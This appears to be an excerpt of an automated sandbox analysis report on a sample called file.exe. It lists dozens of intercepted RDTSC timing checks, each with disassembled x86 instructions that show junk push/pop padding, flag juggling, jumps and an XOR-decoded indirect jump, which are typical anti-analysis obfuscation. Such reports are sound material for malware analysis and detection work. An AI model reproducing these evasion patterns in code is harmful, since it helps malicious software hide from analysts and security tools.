              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120A33 second address: 5120016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a mov bx, 9208h 0x0000000e jmp 00007F15FCC2EA71h 0x00000013 popad 0x00000014 retn 0004h 0x00000017 nop 0x00000018 cmp eax, 00000000h 0x0000001b setne al 0x0000001e xor ebx, ebx 0x00000020 test al, 01h 0x00000022 jne 00007F15FCC2EA67h 0x00000024 xor eax, eax 0x00000026 sub esp, 08h 0x00000029 mov dword ptr [esp], 00000000h 0x00000030 mov dword ptr [esp+04h], 00000000h 0x00000038 call 00007F160121AD41h 0x0000003d mov edi, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F15FCC2EA72h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120016 second address: 5120079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F15FCD6BB61h 0x00000009 adc eax, 654C07A6h 0x0000000f jmp 00007F15FCD6BB61h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F15FCD6BB66h 0x00000024 jmp 00007F15FCD6BB65h 0x00000029 popfd 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120079 second address: 51200CA instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov esi, 67BFD5BBh 0x00000011 mov eax, 418C1297h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F15FCC2EA6Ah 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F15FCC2EA6Dh 0x00000028 add si, 5A76h 0x0000002d jmp 00007F15FCC2EA71h 0x00000032 popfd 0x00000033 mov ax, 9D67h 0x00000037 popad 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51200CA second address: 5120102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push FFFFFFFEh 0x0000000e jmp 00007F15FCD6BB5Eh 0x00000013 call 00007F15FCD6BB59h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F15FCD6BB5Dh 0x00000020 mov dl, ch 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512023D second address: 5120243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120243 second address: 5120247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120247 second address: 512026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov ax, 16EDh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F15FCC2EA6Fh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512026D second address: 5120295 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ah, bh 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120295 second address: 51202C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F15FCC2EA6Dh 0x0000000b or ah, 00000006h 0x0000000e jmp 00007F15FCC2EA71h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51202C5 second address: 5120330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F15FCD6BB68h 0x0000000a jmp 00007F15FCD6BB65h 0x0000000f popfd 0x00000010 popad 0x00000011 mov cx, 2D87h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov si, 6695h 0x0000001e pushfd 0x0000001f jmp 00007F15FCD6BB62h 0x00000024 jmp 00007F15FCD6BB65h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120330 second address: 5120336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120336 second address: 5120357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F15FCD6BB5Fh 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 mov al, 0Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 movsx edx, cx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120357 second address: 51203AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F15FCC2EA70h 0x00000011 and cx, 9A58h 0x00000016 jmp 00007F15FCC2EA6Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F15FCC2EA78h 0x00000022 or si, 24B8h 0x00000027 jmp 00007F15FCC2EA6Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203AF second address: 51203B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203B5 second address: 51203DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F15FCC2EA75h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203DE second address: 5120466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, A892h 0x00000007 mov ebx, 4A74BBDEh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 mov esi, 0E7FD88Dh 0x00000017 popad 0x00000018 mov eax, edi 0x0000001a popad 0x0000001b mov dword ptr [esp], edi 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F15FCD6BB67h 0x00000025 call 00007F15FCD6BB68h 0x0000002a pop eax 0x0000002b popad 0x0000002c mov edi, 549EBB76h 0x00000031 popad 0x00000032 mov eax, dword ptr [769B4538h] 0x00000037 jmp 00007F15FCD6BB5Dh 0x0000003c xor dword ptr [ebp-08h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F15FCD6BB68h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120466 second address: 512046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512046C second address: 512047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCD6BB5Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512047D second address: 5120481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120481 second address: 51204BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F15FCD6BB5Fh 0x00000013 or ah, FFFFFFBEh 0x00000016 jmp 00007F15FCD6BB69h 0x0000001b popfd 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204BE second address: 51204C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204C4 second address: 51204C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204C8 second address: 512050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F15FCC2EA70h 0x0000000f mov esi, 6CA56901h 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F15FCC2EA79h 0x00000020 push eax 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512050A second address: 5120510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120510 second address: 5120514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120514 second address: 5120518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120518 second address: 5120620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F15FCC2EA6Bh 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 jmp 00007F15FCC2EA76h 0x0000001b mov dword ptr [ebp-18h], esp 0x0000001e jmp 00007F15FCC2EA70h 0x00000023 mov eax, dword ptr fs:[00000018h] 0x00000029 jmp 00007F15FCC2EA70h 0x0000002e mov ecx, dword ptr [eax+00000FDCh] 0x00000034 jmp 00007F15FCC2EA70h 0x00000039 test ecx, ecx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F15FCC2EA6Eh 0x00000042 adc cx, BB98h 0x00000047 jmp 00007F15FCC2EA6Bh 0x0000004c popfd 0x0000004d mov edx, eax 0x0000004f popad 0x00000050 jns 00007F15FCC2EAB8h 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007F15FCC2EA70h 0x0000005d sbb cx, E5F8h 0x00000062 jmp 00007F15FCC2EA6Bh 0x00000067 popfd 0x00000068 jmp 00007F15FCC2EA78h 0x0000006d popad 0x0000006e add eax, ecx 0x00000070 pushad 0x00000071 call 00007F15FCC2EA6Eh 0x00000076 mov bx, si 0x00000079 pop ecx 0x0000007a popad 0x0000007b mov ecx, dword ptr [ebp+08h] 0x0000007e push eax 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007F15FCC2EA72h 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120620 second address: 5120624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120624 second address: 512062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512062A second address: 5120633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, B483h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120633 second address: 512065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test ecx, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F15FCC2EA6Ch 0x00000012 adc ah, 00000048h 0x00000015 jmp 00007F15FCC2EA6Bh 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512065C second address: 5120662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120662 second address: 5120666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511018C second address: 511019C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511019C second address: 51101A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101A1 second address: 51101A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101A7 second address: 51101D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007F15FCC2EA78h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F15FCC2EA6Ah 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101D8 second address: 51101DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101DE second address: 5110226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F15FCC2EA70h 0x00000010 sub esp, 2Ch 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F15FCC2EA6Ch 0x0000001c add cx, 76A8h 0x00000021 jmp 00007F15FCC2EA6Bh 0x00000026 popfd 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110226 second address: 5110240 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F15FCD6BB5Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110240 second address: 5110291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F15FCC2EA73h 0x0000000b and cl, 0000004Eh 0x0000000e jmp 00007F15FCC2EA79h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F15FCC2EA73h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110291 second address: 5110297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110297 second address: 51102EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F15FCC2EA72h 0x00000008 pushfd 0x00000009 jmp 00007F15FCC2EA72h 0x0000000e or cl, 00000058h 0x00000011 jmp 00007F15FCC2EA6Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F15FCC2EA76h 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102EF second address: 51102F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102F3 second address: 5110310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110384 second address: 511040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dl, cl 0x00000007 popad 0x00000008 mov edi, 00000000h 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F15FCD6BB62h 0x00000014 mov cx, 1DF1h 0x00000018 popad 0x00000019 mov si, A82Dh 0x0000001d popad 0x0000001e inc ebx 0x0000001f jmp 00007F15FCD6BB68h 0x00000024 test al, al 0x00000026 jmp 00007F15FCD6BB60h 0x0000002b je 00007F15FCD6BD0Eh 0x00000031 jmp 00007F15FCD6BB60h 0x00000036 lea ecx, dword ptr [ebp-14h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F15FCD6BB67h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511040C second address: 5110412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110412 second address: 5110416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51104DE second address: 511051D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F166E47CA05h 0x0000000f jmp 00007F15FCC2EA76h 0x00000014 js 00007F15FCC2EAEFh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F15FCC2EA6Ah 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511051D second address: 511052C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511052C second address: 51105CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 pushad 0x00000011 jmp 00007F15FCC2EA6Fh 0x00000016 mov ah, 52h 0x00000018 popad 0x00000019 popad 0x0000001a jne 00007F166E47C99Dh 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F15FCC2EA71h 0x00000027 adc eax, 414FF906h 0x0000002d jmp 00007F15FCC2EA71h 0x00000032 popfd 0x00000033 mov edx, esi 0x00000035 popad 0x00000036 mov ebx, dword ptr [ebp+08h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov ecx, edi 0x0000003e pushfd 0x0000003f jmp 00007F15FCC2EA6Bh 0x00000044 sub si, 683Eh 0x00000049 jmp 00007F15FCC2EA79h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51105CC second address: 51105EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51105EA second address: 51105EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51105EE second address: 51105F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51105F4 second address: 51106C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d push ecx 0x0000000e call 00007F15FCC2EA79h 0x00000013 pop eax 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F15FCC2EA6Dh 0x0000001e sub ah, FFFFFFE6h 0x00000021 jmp 00007F15FCC2EA71h 0x00000026 popfd 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a movzx esi, bx 0x0000002d popad 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F15FCC2EA75h 0x00000037 sub esi, 32F6E7F6h 0x0000003d jmp 00007F15FCC2EA71h 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007F15FCC2EA70h 0x00000049 sbb si, A118h 0x0000004e jmp 00007F15FCC2EA6Bh 0x00000053 popfd 0x00000054 popad 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F15FCC2EA75h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51106C3 second address: 511074E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e mov cx, dx 0x00000011 popad 0x00000012 nop 0x00000013 jmp 00007F15FCD6BB65h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F15FCD6BB5Eh 0x0000001e push eax 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F15FCD6BB61h 0x00000026 and esi, 106F8026h 0x0000002c jmp 00007F15FCD6BB61h 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F15FCD6BB68h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110056 second address: 5110068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA6Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110068 second address: 51100E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F15FCD6BB64h 0x00000014 xor cx, CEE8h 0x00000019 jmp 00007F15FCD6BB5Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F15FCD6BB67h 0x0000002a xor esi, 4B8176DEh 0x00000030 jmp 00007F15FCD6BB69h 0x00000035 popfd 0x00000036 mov edi, ecx 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110126 second address: 511012A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511012A second address: 511013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511013A second address: 5110154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F15FCC2EA6Bh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110154 second address: 5110171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110171 second address: 5110177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110177 second address: 511017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511017B second address: 5110C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a jmp 00007F15FCC2EA62h 0x0000000c and bl, 00000001h 0x0000000f movzx eax, bl 0x00000012 lea esp, dword ptr [ebp-0Ch] 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 pop ebp 0x00000019 ret 0x0000001a add esp, 04h 0x0000001d mov eax, dword ptr [00B460A4h+ebx*4] 0x00000024 mov ecx, 04B3412Ah 0x00000029 xor ecx, dword ptr [00B460ACh] 0x0000002f add eax, ecx 0x00000031 inc eax 0x00000032 jmp eax 0x00000034 push esi 0x00000035 call 00007F15FCC54C38h 0x0000003a push ebp 0x0000003b push ebx 0x0000003c push edi 0x0000003d push esi 0x0000003e sub esp, 00000284h 0x00000044 mov esi, dword ptr [esp+00000298h] 0x0000004b mov dword ptr [esp+00000268h], 00B48100h 0x00000056 mov dword ptr [esp+00000264h], 0000009Dh 0x00000061 mov dword ptr [esp], 00000000h 0x00000068 mov eax, dword ptr [00B43D58h] 0x0000006d call eax 0x0000006f mov edi, edi 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
